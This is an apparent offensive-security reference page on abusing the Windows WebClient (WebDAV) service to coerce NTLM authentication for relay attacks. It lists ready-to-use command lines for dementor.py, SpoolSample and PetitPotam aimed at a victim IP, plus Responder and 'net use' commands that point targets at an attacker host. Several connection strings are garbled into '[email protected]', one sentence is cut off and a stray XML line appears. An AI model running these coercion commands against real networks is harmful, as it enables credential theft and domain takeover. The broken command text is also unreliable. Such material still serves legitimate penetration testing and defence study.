WebClient abuse (WebDAV)
Web Distributed Authoring and Versioning (WebDAV) is an extension to Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed by using HTTP (docs.microsoft.com)
The WebClient service needs to be enabled for WebDAV-based programs and features to work. As it turns out, the WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug) to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities.
Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.
Regular coercion techniques rely on the attacker forcing a remote system to authenticate to another one. The "other" system is usually an IP address, a domain or NetBIOS name. With WebClient abuse, the other system needs to be supplied in a WebDAV Connection String format.
dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "[email protected]/randomfile.txt" "VICTIM_IP"
SpoolSample.exe "VICTIM_IP" "[email protected]/randomfile.txt"
Petitpotam.py "[email protected]/randomfile.txt" "VICTIM_IP"
Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "[email protected]/randomfile.txt" "VICTIM_IP"
PetitPotam.exe "[email protected]/randomfile.txt" "VICTIM_IP"
On a side note, making a remote system start the WebClient service can be done in many ways
Map a WebDAV server
By mapping a remote WebDAV server. This can be done by having Responder's server up and by running the
# starting responder (in analyze mode to prevent poisoning)
responder --interface "eth0" --analyze
responder -I "eth0" -A
# map the drive from the target WebClient needs to be started on
net use x: http://$RESPONDER_IP/
<?xml version="1.0" encoding="UTF-8"?>
By opening an interactive session with the target (e.g. RDP), opening the Explorer, and type something in the address bar.